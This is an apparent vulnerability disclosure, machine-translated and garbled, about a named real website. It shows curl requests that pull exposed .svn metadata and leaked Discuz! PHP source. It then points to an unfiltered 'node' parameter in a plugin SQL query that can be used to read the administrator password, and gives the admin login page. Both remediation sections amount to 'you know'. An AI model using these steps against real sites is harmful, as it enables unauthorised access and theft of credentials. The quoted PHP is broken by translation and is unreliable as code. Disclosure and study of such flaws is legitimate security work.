The website source code can be downloaded due to improper server settings.
Detailed description:
The website uses svn for version management, but does not impose access permission restrictions on the. svn directory,
Proof of vulnerability:
Xxx @ xxx/www/itpub.net $ curl http://www.itpub.net/.svn/entries
You can get the web root directory file directory list. Based on the list, you can request text-base of svn working copy.
Write a simple script to traverse and download all the source code in the svn repository of the site. More security vulnerabilities can be further analyzed from the source code
Xxx @ xxx/www/itpub.net $ curl http://www.itpub.net/.svn/text-base/member.php.svn-base
<? Php
/**
* [Discuz!] (C) 2001-2099 Comsenz Inc.
* This is NOT a freeware, use is subject to license terms
*
* $ Id: member. php 20112: 10: 53Z monkey $
*/
Define ('apptypeid', 0 );
Define ('curscript', 'member ');
Require './source/class/class_core.php ';
$ Discuz = & discuz_core: instance ();
$ Modarray = array ('activate', 'clearcookies ', 'emailverify', 'getpasswd ',
'Groupexpiry', 'logging', 'lostpasswd ',
'Register ', 'regverify', 'switchstatus', 'connect ');
$ Mod =! In_array ($ discuz-> var ['mod'], $ modarray )? 'Register ': $ discuz-> var ['mod'];
Define ('curmodule', $ mod); www.2cto.com
$ Discuz-> init ();
If ($ mod = 'register '& $ discuz-> var ['mod']! = $ _ G ['setting'] ['regname'] &! Defined ('in _ CONNECT ')){
Showmessage ('undefined _ Action ');
}
Require libfile ('function/member ');
Require libfile ('class/member ');
Runhooks ();
Require DISCUZ_ROOT. './source/module/member _'. $ mod. '. php ';
?>
Solution:
You know how to add access permission restrictions to the. svn directory.
You can easily find the tree application injection vulnerability through the source code of the downloaded itpub.
69 else {
70 $ tmp1 = $ db-> query_first ("select * from pre_plugin_tree_node where level = 1 and nodeid = ". $ _ REQUEST ['node']. "order by ordernum desc ");
71
The node parameter is not filtered out and the administrator password is read.
Management address:
You can log on to the http://www.itpub.net/tree/editlist.php with the discovered administrator password to edit node content
Solution:
You know
Author XiaoYu